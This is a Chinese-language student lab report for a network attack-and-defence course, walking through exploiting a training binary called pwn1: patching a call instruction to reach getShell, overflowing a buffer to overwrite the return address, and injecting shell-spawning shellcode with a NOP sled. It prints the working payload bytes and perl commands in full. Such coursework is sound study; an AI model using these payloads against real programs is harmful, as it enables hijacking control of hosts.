2018-2019-2 网络对抗技术 20165336 Exp1 PC平台逆向破解

1. 逆向及Bof基础实践说明

1.1 实践目标

本次实践的对象是一个名为pwn1的linux可执行文件。该程序正常执行流程是：main调用foo函数,foo函数会简单回显任何用户输入的字符串。该程序同时包含另一个代码片段，getShell，会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。

1.2实践内容如下：

手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数。

利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数。

注入一个自己制作的shellcode并运行这段shellcode。

这几种思路，基本代表现实情况中的攻击目标:

运行原本不可访问的代码片段

强行修改程序执行流

以及注入运行任意代码。

1.3 基础知识

1.3.1掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码

NOP：机器码：90。类似一个空指令，执行时CUP什么都不做，执行过这条指令在执行下一条指令。
JNE：机器码：75。如果条件不相等跳转到要跳转的位置。
JE：机器码：74。如果条件相等则跳转。
JMP：机器码：EB。直接跳转到所需跳转的位置。
补：段内直接短转Jmp short 段内直接近转移Jmp near（机器码：E9）段内间接转移 Jmp word（机器码：FF）段间直接(远)转移Jmp far（机器码：EA）
CMP：类似通过对操作数做减法来比较操作数的指令，只做比较不保存结果。会对标志寄存器产生影响。

1.3.2掌握反汇编与十六进制编程器

任务一：直接修改程序机器指令，改变程序执行流程

知识要求：

Call指令，EIP寄存器,指令跳转的偏移计算，补码，反汇编指令objdump，十六进制编辑工具
学习目标：

理解可执行文件与机器指令

进阶：掌握ELF文件格式，掌握动态技术

（1）下载目标文件pwn1,`objdump -d pwn1`反汇编。

（2）图中的`"call 8048491 "`是汇编指令，这条指令将调用位于地址8048491处的foo函数；

（3）调用`getShell`，只要修改“d7ffffff”为，"getShell-80484ba"对应的补码就行。用Windows计算器，直接 47d-4ba就能得到补码，是`c3ffffff`。下面我们就修改可执行文件，将其中的call指令的目标地址由`d7ffffff`变为`c3ffffff`。

（4）找到后前后的内容和反汇编的对比下，确认是地方是正确的

（5）在图形化的16进制编程器中完成结果。

运行改后的代码，会得到`shell提示符`

任务二：通过构造输入参数，造成BOF攻击，改变程序执行流

知识要求：堆栈结构，返回地址
学习目标：理解攻击缓冲区的结果，掌握返回地址的获取进阶：掌握ELF文件格式，掌握动态技术

（1）`反汇编`，了解程序的基本功能`objdump -d pwn1 | more`

（2）确认`输入字符串`哪几个字符会覆盖到`返回地址`

（3）如果输入字符串1111111122222222333333334444444412345678，那 1234 那四个数最终会覆盖到堆栈上的返回地址，进而CPU会尝试运行这个位置的代码。那只要把这四个字符替换为 getShell 的内存地址，输给pwn1，pwn1就会运行getShell。

（4）确认用什么值来覆盖返回地址。getShell的内存地址，通过反汇编时可以看到，即0804847d。应输入`==11111111222222223333333344444444\x7d\x84\x04\x08`。

（5）构造输入字符串`perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input`可以使用`16进制查看指令xxd`查看input文件的内容是否如预期。然后将`input的输入`，通过`管道符“|”`，作为`pwn1`的输入`(cat input; cat) | ./pwn1`。

任务三：注入Shellcode并执行

准备工作：修改些设置。

（1）构造要注入的payload采用`nop+shellcode+retaddr。`

perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode最后的\x4\x3\x2\x1将覆盖到堆栈上的返回地址的位置。我们得把它改为这段shellcode的地址。

（2）确定`\x4\x3\x2\x1`到底该填什么。

注：中间因为填错了数据导致后面注入后输入ls命令出错，所以这个`\x4\x3\x2\x1`填写时千万要注意！！

（3）打开另一个终端注入这段攻击buf`(cat input_shellcode;cat) | ./pwn1`：

再次攻击，成功!

实验收获与感想

      本次实验是关于PC平台逆向破解的实验，根据老师的教程和同学的指导，在经历了一些挫折以后我完整的完成了第一次实验，在实验过程中我充满着对网络对抗这门课的兴趣，在这些兴趣的陪伴下越发激起了我要学好这门课的信心。在实验过程中，深刻体会到储存地址值对跳转指令以及进而影响能否注入成功的重要性，这次实验提高了我的动手能力，在努力学习网络对抗后拓宽了我的知识面，使我受益匪浅。

什么是漏洞？漏洞有什么危害？

（1）这次实验用到了缓冲区溢出漏洞，我对这次缓冲区溢出漏洞的理解是想要更改的数据溢出覆盖在合法数据上，从而破坏程序的堆栈。

（2）缓冲区漏洞的危害有取得该程序的控制权，进而通过命令控制整个主机。